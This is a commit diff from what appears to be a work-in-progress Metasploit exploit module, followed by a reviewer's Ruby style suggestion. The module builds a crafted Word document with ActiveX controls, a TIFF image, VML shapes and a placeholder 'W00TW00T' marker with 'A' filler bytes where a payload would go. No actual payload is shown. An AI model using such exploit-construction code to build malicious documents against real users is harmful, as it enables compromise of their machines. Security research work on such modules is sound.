More progress

bug/bundler_fix
sinn3r 2013-11-21 18:48:12 -06:00
parent 56d1c545e7
commit 8382d31f46
1 changed files with 73 additions and 11 deletions


@ -201,7 +201,9 @@ class Metasploit3 < Msf::Exploit::Remote
mscd << [0x00000003].pack('V') mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V') mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 52 mscd << [0xffffffff].pack('V') * 52
# mscd << "PAYLOAD"
mscd << "W00TW00T"
mscd << "A" * 1024
mscd mscd
end end
@ -344,8 +346,37 @@ class Metasploit3 < Msf::Exploit::Remote
'w:shapeid' =>"_x0000_i10#{rid.to_s}" 'w:shapeid' =>"_x0000_i10#{rid.to_s}"
} }
shapetype_attrs = {
'id' => "rId#{rid.to_s}",
'coordsize' => "21600,21600",
'o:spt' => "75",
'o:preferrelative' => "t",
'path' => "m@4@5l@4@11@9@11@9@5xe",
'filled' => "f",
'stroked' => "f"
}
xml.r do xml.r do
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
xml['v'].shapetype(shapetype_attrs) do
xml['v'].stroke({'joinstyle'=>'miter'})
xml['v'].formulas do
xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
xml['v'].f({'eqn' => "sum @0 1 0"})
xml['v'].f({'eqn' => "sum 0 0 @1"})
xml['v'].f({'eqn' => "prod @2 1 2"})
xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
xml['v'].f({'eqn' => "sum @0 0 1"})
xml['v'].f({'eqn' => "prod @6 1 2"})
xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
xml['v'].f({'eqn' => "sum @8 21600 0"})
xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
xml['v'].f({'eqn' => "sum @10 21600 0"})
end
xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
end
xml['v'].shape(shape_attrs) xml['v'].shape(shape_attrs)
xml['w'].control(control_attrs) xml['w'].control(control_attrs)
end end
@ -410,6 +441,36 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#
# Creates a <w:sectPr> tag
# @param xml [Element]
#
def create_secpr(xml)
sectpr_attrs = {
'w:rsidR' => "00D15BD0",
'w:rsidRPr' => "00D15BD0",
'w:rsidSect' => "00F8254F"
}
pgmar_attrs = {
'w:top' => "1",
'w:right' => "1",
'w:bottom' => "1",
'w:left' => "1",
'w:header' => "1",
'w:footer' => "1",
'w:gutter' => "0"
}
xml['w'].sectPr(sectpr_attrs) do
xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
xml['w'].pgMar(pgmar_attrs)
xml['w'].cols({'w:space'=>"1"})
xml['w'].docGrid({'w:linePitch'=>"1"})
end
end
# #
# Creates a document.xml file # Creates a document.xml file
# @param pre_defs [Array] # @param pre_defs [Array]
@ -420,7 +481,7 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml(last_rid, pre_defs, activex, tiff_file) def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs # Get all the required pre-defs
chart_rids = [] chart_rids = []
pre_defs.select { |e| chart_rids << e[:id] } pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs # Get all the ActiveX RIDs
ax_rids = [] ax_rids = []
@ -461,10 +522,10 @@ class Metasploit3 < Msf::Exploit::Remote
xml.rPr do xml.rPr do
xml.lang({'w:val' => "en-US"}) xml.lang({'w:val' => "en-US"})
end end
end
ax_rids.each do |rid| ax_rids.each do |rid|
create_ax_run_element(xml, rid) create_ax_run_element(xml, rid)
end
end end
end end
@ -480,6 +541,7 @@ class Metasploit3 < Msf::Exploit::Remote
create_pic_run_element(xml, tiff_rid) create_pic_run_element(xml, tiff_rid)
end end
create_secpr(xml)
end end
end end
end end
@ -502,16 +564,16 @@ class Metasploit3 < Msf::Exploit::Remote
def make_contenttype_xml(overrides) def make_contenttype_xml(overrides)
contenttypes = [ contenttypes = [
{ {
:Extension =>"rels", :Extension => "rels",
:ContentType =>"application/vnd.openxmlformats-package.relationships+xml" :ContentType => "application/vnd.openxmlformats-package.relationships+xml"
}, },
{ {
:Extension =>"xml", :Extension => "xml",
:ContentType =>"application/xml" :ContentType => "application/xml"
}, },
{ {
:Extension =>"jpeg", :Extension => "jpeg",
:Contenttype =>"image/jpeg" :Contenttype => "image/jpeg"
}, },
{ {
:Extension => "bin", :Extension => "bin",
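Review bot: In init_doc_xml, the changed line `pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}` calls `select` only for its side effect and discards the array it returns, so the filtering intent is hidden in a modifier `if`. Building the list directly reads more clearly and keeps the same result: `chart_rids = pre_defs.select { |e| e[:fname] =~ %r{/word/charts/} }.map { |e| e[:id] }`, which also makes the preceding `chart_rids = []` unnecessary. Using `%r{}` removes the escaped slashes. The body of init_doc_xml continues outside the hunk, so confirm that nothing else appends to `chart_rids` before adopting this form.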